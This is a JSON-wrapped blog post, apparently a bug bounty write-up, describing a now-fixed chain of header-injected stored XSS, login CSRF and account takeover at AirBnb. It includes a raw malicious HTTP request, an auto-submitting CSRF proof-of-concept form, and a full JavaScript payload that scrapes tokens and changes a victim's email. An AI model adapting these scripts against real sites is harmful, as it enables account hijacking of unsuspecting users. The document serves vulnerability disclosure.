{"id":204,"date":"2016-10-05T20:13:47","date_gmt":"2016-10-05T14:43:47","guid":{"rendered":"http:\/\/www.geekboy.ninja\/blog\/?p=204"},"modified":"2017-10-17T04:35:19","modified_gmt":"2017-10-16T23:05:19","slug":"airbnb-bug-bounty-turning-self-xss-into-good-xss-2","status":"publish","type":"post","link":"http:\/\/www.geekboy.ninja\/blog\/airbnb-bug-bounty-turning-self-xss-into-good-xss-2\/","title":{"rendered":"AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2"},"content":{"rendered":"

Hello guys \ud83d\ude42<\/span><\/p>\n

so this post is about one of my most interesting find while participating in bug bounty programs,\u00a0yes\u00a0interesting as its combination of many issues at AirBnb.<\/span><\/p>\n

for those who don’t know AirBnb is running public program at HackerOne<\/a><\/strong>\u00a0and i will suggest to participate\u00a0in their program.\u00a0<\/span><\/p>\n

here is list of issues which i got while doing research and\u00a0used to escalate it further.<\/span><\/p>\n

    \n
  1. Injecting XSS payload via\u00a0True-Client-IP header.<\/strong><\/span><\/li>\n
  2. Exploiting login\/logout CSRF.<\/strong><\/span><\/li>\n
  3. Escalating Self Stored XSS to Change victim’s account email.\u00a0<\/strong><\/span><\/li>\n<\/ol>\n

    let’s go into details ,<\/span><\/p>\n

    Injecting XSS payload via\u00a0True-Client-IP header:<\/strong><\/span><\/p>\n

    Airbnb use to track users ip to show them under users security setting to make sure users are aware of via which ip or location his\/her account got logged in previously in case of password reuse by others.<\/span><\/p>\n

    it’s good practice to give their users more secure feeling but not if its not implemented very well.<\/span><\/p>\n

    so this how users can see their login\u00a0history under security setting .<\/span><\/p>\n

    \"login_track\"<\/a><\/span><\/p>\n

    if you hover your pointer to ?<\/strong><\/span> \u00a0<\/strong>icon the IP address of source machine will get reflected, so my initial thought is to spoof the source IP\u00a0\u00a0as i heard about it\u00a0before here.<\/a><\/strong><\/span><\/p>\n

    I\u00a0come to know i can spoof the IP with any IP using\u00a0True-Client-IP <\/strong>header with\u00a0login\u00a0request, as result we can show any desired\u00a0IP\u00a0in login history.<\/span><\/p>\n

    Its good but still not convincing to report as its something we can do with our own account or for others we need password which is obviously not acceptable case.<\/span><\/p>\n

    credit goes to\u00a0Parth<\/strong><\/a> for throwing idea of trying other strings instead of IP with\u00a0True-Client-IP, <\/strong>so i did and any string get reflected under security setting directly and now we can just think of getting XSS , so i got.<\/span><\/p>\n

    Giving XSS payload instead of any ip with True-Client-IP<\/strong>\u00a0header did the work.<\/span><\/p>\n

    POST \/authenticate HTTP\/1.1\r\nHost: www.airbnb.co.in\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.3; rv:36.0) Gecko\/20100101 Firefox\/36.04\r\nAccept: application\/json, text\/javascript, *\/*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nX-CSRF-Token: V4$.airbnb.co.in$CpeQjCEtXnk$D7u8JuX39keALZgtvsmD3wr0_unmJBU3hVmj71h0Xlc=\r\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\r\nCache-Control: no-cache\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https:\/\/www.airbnb.co.in\/\r\nTrue-Client-IP: <h1>XSS<\/h1><\/center><script>alert(document.domain)<\/script>\r\nContent-Length: 198\r\nCookie: [REDACTED]\r\nConnection: close\r\n\r\nutf8=\u00e2\u009c\u0093&authenticity_token=[REDACTED]&from=email_login&airlock_id=&email=[REDACTED]&password=[REDACTED]<\/pre>\n
     <\/p>\n
    And this is how i manage to get self stored xss under security setting .<\/span><\/p>\n
    Whenever i make request to\u00a0security page<\/strong>\u00a0, Self Stored XSS get executed.<\/span><\/p>\n
    \"xss_airbnb\"<\/a><\/span><\/p>\n
     <\/p>\n
    Exploiting login\/logout CSRF:<\/strong><\/span><\/p>\n
    As i noticed there no csrf protection login as well as logout, i can easily make anyone to get logged out from his\/her account and get logged into my account and get redirect to security page where XSS will get executed on victim browser.<\/span><\/p>\n
    CSRF Poc Code for the same :<\/strong><\/span><\/p>\n
    <html>\r\n <body>\r\n <center> <br>\r\n <form action=\"https:\/\/www.airbnb.co.in\/authenticate\" method=\"POST\">\r\n <input type=\"hidden\" name=\"utf8\" value=\"\u00e2\u009c\u0093\" \/>\r\n <input type=\"hidden\" name=\"authenticity_token\" value=\"\" \/>\r\n <input type=\"hidden\" name=\"from\" value=\"email_login\" \/>\r\n <input type=\"hidden\" name=\"airlock_id\" value=\"\" \/>\r\n <input type=\"hidden\" name=\"email\" value=\"attackers@email.com\" \/>\r\n <input type=\"hidden\" name=\"password\" value=\"attacker@password\" \/>\r\n <input type=\"hidden\" name=\"form_remember_browser\" value=\"yes\" \/>\r\n <input type=\"hidden\" name=\"redirect_params\" value=\"https:\/\/www.airbnb.co.in\/users\/security\/78323762\" \/>\r\n <input type=\"submit\" value=\"XSS ME\" \/>\r\n <\/form>\r\n <script>\r\n document.forms[0].submit();\r\n <\/script>\r\n <\/center>\r\n <\/body>\r\n<\/html><\/pre>\n
     <\/p>\n
    this could be enough to report but still i want to check for if i can escalate further, my thought was to exploit this in victim’s account instead of making victim to logged into my account.<\/span><\/p>\n
    Escalation of \u00a0Self Stored XSS to Change victim’s account email:<\/strong><\/span><\/p>\n
    at AirBnb social logins is also an option for using it, so users can use their Google, Facebook account and i got the way to making this XSS exploitable for users who using Social Login<\/strong> to access AirBnb.<\/span><\/p>\n
    and this can be done in following way :<\/span><\/p>\n
      \n
    • Instead of normal XSS Payload, Injected remote hosted JS.<\/strong><\/span><\/li>\n
    • Victim to login into attacker’s account via CSRF<\/strong><\/span><\/li>\n
    • Attacker’s Remote Hosted JS will get executed .<\/strong><\/span><\/li>\n
    • JS will perform 4 actions in IFrame which are as follows :<\/strong><\/span>\n
        \n
      • Victim will logged out from attacker’s account<\/strong><\/span><\/li>\n
      • Victim will get logged into his account via Google\u00a0Sign in<\/strong><\/span><\/li>\n
      • Attacker will navigate to page Profile Setting page<\/strong><\/span><\/li>\n
      • Attacker will Extract the CSRF Token from source code .<\/strong><\/span><\/li>\n
      • Attacker\u00a0will update the\u00a0victim\u00a0email.<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
        looks complex ? but javascript will do it at once, i need to mention\u00a0some minor things, which helps to making the scenario\u00a0successful.<\/span><\/p>\n
        X-Frame Header<\/strong> is\u00a0set to sameorigin<\/strong> , so i was able to make those 4 different request via iframe in context of airbnb host.<\/span><\/p>\n
        Social Login users don’t have password re-authentication<\/strong> while changing\u00a0the email, and once we changed it, we can reset the account via password reset process.<\/span><\/p>\n
        Making all in One :\u00a0<\/strong><\/span><\/p>\n
        document.body.innerHTML='<html><body><center><h1>Testing :)<\/h1><\/center><\/body><\/html>';\r\n\r\nvar profileIframe = document.createElement('iframe');\r\n profileIframe.setAttribute('src', 'https:\/\/www.airbnb.co.in\/logout');\r\n profileIframe.setAttribute('id', 'pi');\r\n document.body.appendChild(profileIframe);\r\n\r\ndocument.getElementById('pi').onload = function() {\r\n var profileIframe1 = document.createElement('iframe');\r\n profileIframe1.setAttribute('src', 'https:\/\/www.airbnb.co.in\/oauth_connect?from=google_login&service=google');\r\n profileIframe1.setAttribute('id', 'lo1');\r\n document.body.appendChild(profileIframe1);\r\n\r\ndocument.getElementById('lo1').onload = function() {\r\n var profileIframe2 = document.createElement('iframe');\r\n profileIframe2.setAttribute('src', 'https:\/\/www.airbnb.co.in\/users\/edit');\r\n profileIframe2.setAttribute('id', 'po');\r\n document.body.appendChild(profileIframe2);\r\n\r\ndocument.getElementById('po').onload = function() {\r\n\r\nvar lol = document.getElementById('po').contentWindow.document.body.innerHTML;\r\nvar ha = lol.split('\"authenticity_token\" type=\"hidden\" value=\"');\r\nvar na = ha[1].split('\"');\r\n\r\nvar ha2 = lol.split('https:\/\/www.airbnb.co.in\/users\/edit_verification\/');\r\nvar na2 = ha2[1].split('\"');\r\n\r\nvar ha22 = lol.split('\"user[first_name]\" size=\"30\" type=\"text\" value=\"');\r\nvar na22 = ha22[1].split('\"');\r\n\r\nvar ha221 = lol.split('\"user[last_name]\" size=\"30\" type=\"text\" value=\"');\r\nvar na221 = ha221[1].split('\"');\r\n\r\nvar ha222 = lol.split('\"user[email]\" size=\"30\" type=\"text\" value=\"');\r\nvar na222 = ha222[1].split('\"');\r\n\r\n\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"https:\/\/www.airbnb.co.in\/update\/\"+na2[0]+\"\", true);\r\n xhr.setRequestHeader(\"Accept\", \"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n xhr.setRequestHeader(\"Content-Type\", \"application\/x-www-form-urlencoded\");\r\n xhr.withCredentials = true;\r\n var body = \"utf8=\u00c3\u0192\u00c2\u00a2\u00c3\u201a\u00c5\u201c\u00c3\u201a\u00e2\u20ac\u0153&authenticity_token=\"+na[0]+\"&user[first_name]=Got&user[last_name]=Hacked&user[email]=gothacked@hacker.com&user_id=\"+na2[0]+\"\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i); \r\n xhr.send(new Blob([aBody]));\r\n }\r\n submitRequest();\r\n\r\n}}}<\/pre>\n
         <\/p>\n
        Later Airbnb removed the Login History<\/strong> feature from account setting which was root cause of the issue for fixing it.<\/p>\n
        Video POC :<\/strong><\/p>\n